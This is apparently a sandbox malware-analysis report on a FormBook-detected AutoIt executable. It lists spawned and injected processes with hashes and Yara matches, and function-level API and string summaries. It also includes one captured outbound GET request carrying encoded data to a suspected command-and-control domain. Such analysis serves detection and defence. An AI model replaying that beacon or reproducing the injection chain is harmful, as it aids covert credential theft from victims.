Jan 11, 2025 02:52:28.158870935 CET	376	OUT	GET /kf1m/?T0JX6z9=gD/FPiA75bYZCbZDbB+WsVUzjKMJP+r4HqBHW8I3+Q/3qqcwdH4XqO3fnm/yt4rkfBlpHF229jnZH/lk0nBoXOKBKPZyn2cike7Ub3qNJZbDUNl9s1XUkaYGScVYwZ61FA==&Ih6=GzF8v0ph3F HTTP/1.1 Accept: / Accept-Language: en-US Connection: close Host: www.zkdamdjj.shop User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36

Target ID:	0
Start time:	20:49:33
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\AxKxwW9WGa.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\AxKxwW9WGa.exe"
Imagebase:	0x440000
File size:	1'224'192 bytes
MD5 hash:	FBB92E684CE0E80F01A084850F8E38E1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	20:49:37
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\AxKxwW9WGa.exe"
Imagebase:	0xee0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1736577132.0000000003650000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1736053839.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1736619988.0000000004E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	20:49:51
Start date:	10/01/2025
Path:	C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe"
Imagebase:	0x740000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3334427443.0000000003BD0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	20:49:53
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\mobsync.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\mobsync.exe"
Imagebase:	0x8c0000
File size:	93'696 bytes
MD5 hash:	F7114D05B442F103BD2D3E20E78A7AA5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3334269313.0000000004960000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3332853744.0000000002CA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3334225307.0000000004910000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	20:50:18
Start date:	10/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6d20e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.8%
Dynamic/Decrypted Code Coverage:	1.5%
Signature Coverage:	8.4%
Total number of Nodes:	2000
Total number of Limit Nodes:	178

Executed Functions

Function 00443B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00443B68
IsDebuggerPresent.KERNEL32 ref: 00443B7A
GetFullPathNameW.KERNEL32(00007FFF,?,?,005052F8,005052E0,?,?), ref: 00443BEB

Part of subcall function 00447BCC: _memmove.LIBCMT ref: 00447C06

Part of subcall function 0045092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00443C14,005052F8,?,?,?), ref: 0045096E

SetCurrentDirectoryW.KERNEL32(?), ref: 00443C6F
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,004F7770,00000010), ref: 0047D281
SetCurrentDirectoryW.KERNEL32(?,005052F8,?,?,?), ref: 0047D2B9
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,004F4260,005052F8,?,?,?), ref: 0047D33F
ShellExecuteW.SHELL32(00000000,?,?), ref: 0047D346

Part of subcall function 00443A46: GetSysColorBrush.USER32(0000000F), ref: 00443A50
Part of subcall function 00443A46: LoadCursorW.USER32(00000000,00007F00), ref: 00443A5F
Part of subcall function 00443A46: LoadIconW.USER32(00000063), ref: 00443A76
Part of subcall function 00443A46: LoadIconW.USER32(000000A4), ref: 00443A88
Part of subcall function 00443A46: LoadIconW.USER32(000000A2), ref: 00443A9A
Part of subcall function 00443A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00443AC0
Part of subcall function 00443A46: RegisterClassExW.USER32(?), ref: 00443B16

Part of subcall function 004439D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00443A03
Part of subcall function 004439D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00443A24
Part of subcall function 004439D5: ShowWindow.USER32(00000000,?,?), ref: 00443A38
Part of subcall function 004439D5: ShowWindow.USER32(00000000,?,?), ref: 00443A41

Part of subcall function 0044434A: _memset.LIBCMT ref: 00444370
Part of subcall function 0044434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00444415

Strings

runas, xrefs: 0047D33A
This is a third-party compiled AutoIt script., xrefs: 0047D279
%M, xrefs: 00443C44

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas$%M
API String ID: 529118366-2687303128
Opcode ID: 9809eda19d13b1aabd2159e9dca7392458abad9251f441c86584e81652c67a17
Instruction ID: fc70fd84fd8a04ee61e6de93e50ff366c0a1370022066f9553e9159354f55e37
Opcode Fuzzy Hash: 9809eda19d13b1aabd2159e9dca7392458abad9251f441c86584e81652c67a17
Instruction Fuzzy Hash: 81512675D04109AAEF00EFB5DC46EEE7B79AF54704B0040BBF811A21A2DB6C560ADF29

Function 004449A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 004449CD

Part of subcall function 00447BCC: _memmove.LIBCMT ref: 00447C06

GetCurrentProcess.KERNEL32(?,004CFAEC,00000000,00000000,?), ref: 00444A9A
IsWow64Process.KERNEL32(00000000), ref: 00444AA1
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00444AE7
FreeLibrary.KERNEL32(00000000), ref: 00444AF2
GetSystemInfo.KERNEL32(00000000), ref: 00444B23
GetSystemInfo.KERNEL32(00000000), ref: 00444B2F

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: ff6bf485df315828c21d65e6f3a561d1f03dc5599020d66fc7e307143d4d9258
Instruction ID: 1a1a34cf5d0a2571cedcc0d8b0f4469dcdfb025a55295ebee342e3397ba53c32
Opcode Fuzzy Hash: ff6bf485df315828c21d65e6f3a561d1f03dc5599020d66fc7e307143d4d9258
Instruction Fuzzy Hash: FD91B4319897C0DAD731DBA885506ABFFF5AF69300B484D6FD0CA93B41D628A508C76E

Function 00444E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00444D8E,?,?,00000000,00000000), ref: 00444E99
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00444D8E,?,?,00000000,00000000), ref: 00444EB0
LoadResource.KERNEL32(?,00000000,?,?,00444D8E,?,?,00000000,00000000,?,?,?,?,?,?,00444E2F), ref: 0047D937
SizeofResource.KERNEL32(?,00000000,?,?,00444D8E,?,?,00000000,00000000,?,?,?,?,?,?,00444E2F), ref: 0047D94C
LockResource.KERNEL32(00444D8E,?,?,00444D8E,?,?,00000000,00000000,?,?,?,?,?,?,00444E2F,00000000), ref: 0047D95F

Strings

SCRIPT, xrefs: 00444EA6

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 30317cd6945ab574b6a858cc94ba48fcb12c208f26a166eb566dc7f2bbcc3cf0
Instruction ID: 63d6cd5973214e8dc83c2dd3f57f75ac5e6321b66775e219b591b61f7d25a4b2
Opcode Fuzzy Hash: 30317cd6945ab574b6a858cc94ba48fcb12c208f26a166eb566dc7f2bbcc3cf0
Instruction Fuzzy Hash: 92115E75240700BFE7218B65EC48F677BBEFBC5B12F20427DF50586250DB66E8048665

Function 0044FCE0 Relevance: 9.8, APIs: 3, Strings: 2, Instructions: 1040COMMON

Download Yara Rule

Strings

pbP, xrefs: 004849B9
%M, xrefs: 0044FCF3

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: BuffCharUpper
String ID: pbP$%M
API String ID: 3964851224-4177612897
Opcode ID: 15c0354ed5b027fae475e263649d43383b484368e1c2864021b37f9e26944a88
Instruction ID: 7269cceef98cb770db04e4c8015ccfe3a7da8cb915c8dde305a9ab8e293124c0
Opcode Fuzzy Hash: 15c0354ed5b027fae475e263649d43383b484368e1c2864021b37f9e26944a88
Instruction Fuzzy Hash: A4926D746083419FD720DF25C480B2BB7E1BF85304F14896EE88A9B352D779EC49CB9A

Function 0044E6A0 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON

Download Yara Rule

Strings

DdP, xrefs: 0044EAC1
DdP, xrefs: 00483B2E
Variable must be of type 'Object'., xrefs: 00483E62
DdP, xrefs: 0044EABA
DdP, xrefs: 00483AF5

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID:
String ID: DdP$DdP$DdP$DdP$Variable must be of type 'Object'.
API String ID: 0-517419912
Opcode ID: c95df1ad2182bfbbd9371e926cb8d3650811d23c690711362c9f869bd9c5e5c8
Instruction ID: 62ebeabd3c381d702d0dff65415021502fe0a663f04d604acaef6626db043893
Opcode Fuzzy Hash: c95df1ad2182bfbbd9371e926cb8d3650811d23c690711362c9f869bd9c5e5c8
Instruction Fuzzy Hash: F1A2AD74A00205CFEB24DF5AC480AAEB7B1FF59314F24846BE805AB351D739ED46CB99

Function 004A445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,0047E398), ref: 004A446A
FindFirstFileW.KERNELBASE(?,?), ref: 004A447B
FindClose.KERNEL32(00000000), ref: 004A448B

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 01f448922b0878de4973f0afa109854e66be277a5f0a5e62adb2167941b01ae8
Instruction ID: ba16687a2be810483f572bbc19e673c88338e9986a44e663363d3e97374065ea
Opcode Fuzzy Hash: 01f448922b0878de4973f0afa109854e66be277a5f0a5e62adb2167941b01ae8
Instruction Fuzzy Hash: 38E0DF328109006B8210AB78EC0D8EE779D9E9A335F200766FC35C21E0EBFC9904969E

Function 004509D0 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00450A5B
timeGetTime.WINMM ref: 00450D16
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00450E53
Sleep.KERNEL32(0000000A), ref: 00450E61
LockWindowUpdate.USER32(00000000,?,?), ref: 00450EFA
DestroyWindow.USER32 ref: 00450F06
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00450F20
Sleep.KERNEL32(0000000A,?,?), ref: 00484E83
TranslateMessage.USER32(?), ref: 00485C60
DispatchMessageW.USER32(?), ref: 00485C6E
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00485C82

Strings

@COM_EVENTOBJ, xrefs: 004854F0
@GUI_CTRLHANDLE, xrefs: 00484FE4
pbP, xrefs: 004857B4
pbP, xrefs: 00485003
pbP, xrefs: 00484FAE
@GUI_WINHANDLE, xrefs: 00484F8F
@TRAY_ID, xrefs: 0048578F
@GUI_CTRLID, xrefs: 00484F3A
pbP, xrefs: 00484F59

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pbP$pbP$pbP$pbP
API String ID: 4212290369-2513637268
Opcode ID: a0d3687dc66c1703194d862902ce1bcacc58cca35f91fb690d8fd151db4e0bcc
Instruction ID: 1a7997d09d068b1c1abf5c10a33ed293c21e0a3d1d3cd20a08755ec992534305
Opcode Fuzzy Hash: a0d3687dc66c1703194d862902ce1bcacc58cca35f91fb690d8fd151db4e0bcc
Instruction Fuzzy Hash: C6B2C074608741DBD724EF24C884BAFB7E5BF84304F14491FE849972A2DB78E849DB4A

Function 004A9155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004A8F5F: __time64.LIBCMT ref: 004A8F69

Part of subcall function 00444EE5: _fseek.LIBCMT ref: 00444EFD

__wsplitpath.LIBCMT ref: 004A9234

Part of subcall function 004640FB: __wsplitpath_helper.LIBCMT ref: 0046413B

_wcscpy.LIBCMT ref: 004A9247
_wcscat.LIBCMT ref: 004A925A
__wsplitpath.LIBCMT ref: 004A927F
_wcscat.LIBCMT ref: 004A9295
_wcscat.LIBCMT ref: 004A92A8

Part of subcall function 004A8FA5: _memmove.LIBCMT ref: 004A8FDE
Part of subcall function 004A8FA5: _memmove.LIBCMT ref: 004A8FED

_wcscmp.LIBCMT ref: 004A91EF

Part of subcall function 004A9734: _wcscmp.LIBCMT ref: 004A9824
Part of subcall function 004A9734: _wcscmp.LIBCMT ref: 004A9837

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004A9452
_wcsncpy.LIBCMT ref: 004A94C5
DeleteFileW.KERNEL32(?,?), ref: 004A94FB
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 004A9511
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004A9522
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004A9534

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 2abffea69418e5f0cfec6c8eee68504d7e138955f972dd63115a4aa3ace565ff
Instruction ID: 60e0c0cbd0c935841c92ac659d87dde94d4ad8fc500e0fa4191b94ff437fffe5
Opcode Fuzzy Hash: 2abffea69418e5f0cfec6c8eee68504d7e138955f972dd63115a4aa3ace565ff
Instruction Fuzzy Hash: C6C14CB1D00219AADF11DF95CC81ADEB7BDEF99304F0040ABF609E6141EB389E458F69

Function 00443015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 72
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00443074
RegisterClassExW.USER32(00000030), ref: 0044309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004430AF
InitCommonControlsEx.COMCTL32(?), ref: 004430CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004430DC
LoadIconW.USER32(000000A9), ref: 004430F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00443101

Strings

+, xrefs: 0044305D
0, xrefs: 00443056
AutoIt v3 GUI, xrefs: 00443090
TaskbarCreated, xrefs: 004430A4

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 22f70aab39be09ba60721b4b21d6e2964d5790363b7e80d5052cc7a8407bff1c
Instruction ID: 1ccae14f4057fbb6d2b43159f80bc55d66d8632434374826f1bb5c4dbafa1ada
Opcode Fuzzy Hash: 22f70aab39be09ba60721b4b21d6e2964d5790363b7e80d5052cc7a8407bff1c
Instruction Fuzzy Hash: 34314871841309AFDB50CFA4D888B9EBBF1FF08310F24816EE580E62A1E3B90589CF44

Function 00443041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00443074
RegisterClassExW.USER32(00000030), ref: 0044309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004430AF
InitCommonControlsEx.COMCTL32(?), ref: 004430CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004430DC
LoadIconW.USER32(000000A9), ref: 004430F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00443101

Strings

+, xrefs: 0044305D
0, xrefs: 00443056
AutoIt v3 GUI, xrefs: 00443090
TaskbarCreated, xrefs: 004430A4

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 9846b66ff11d940b8f6a0ef35fb639b36a952933bf98d4e7be366ff65d268532
Instruction ID: b7b1887bfcb213dcb2b05a291465c6899dcf24e2e73599364e98a9b510b7df1c
Opcode Fuzzy Hash: 9846b66ff11d940b8f6a0ef35fb639b36a952933bf98d4e7be366ff65d268532
Instruction Fuzzy Hash: 2F21F9B5901708AFDB40DFA4EC48B9EBBF5FB08700F10812AF910A62A0E7B545489F95

Function 0044708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00444706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,005052F8,?,004437AE,?), ref: 00444724

Part of subcall function 0046050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00447165), ref: 0046052D

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 004471A8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0047E8C8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0047E909
RegCloseKey.ADVAPI32(?), ref: 0047E947
_wcscat.LIBCMT ref: 0047E9A0

Strings

\Include\, xrefs: 00447165
Include, xrefs: 0047E8BF, 0047E900
Software\AutoIt v3\AutoIt, xrefs: 0044719E
\, xrefs: 0047E9C3

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 6ecc3a0fadf824af1ac79dda45cf429d5a8d779f259d75ad34540dee802ea275
Instruction ID: e8b13da6820862e14268cf302fa1617c602677b9a75439e32875df3caaae2196
Opcode Fuzzy Hash: 6ecc3a0fadf824af1ac79dda45cf429d5a8d779f259d75ad34540dee802ea275
Instruction Fuzzy Hash: 3771B1B55083029ED300EF26EC4199FBBE8FF98314B40452FF445832A1EB79994DDB5A

Function 00443633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 004436D2
KillTimer.USER32(?,00000001), ref: 004436FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0044371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0044372A
CreatePopupMenu.USER32 ref: 0044373E
PostQuitMessage.USER32(00000000), ref: 0044374D

Strings

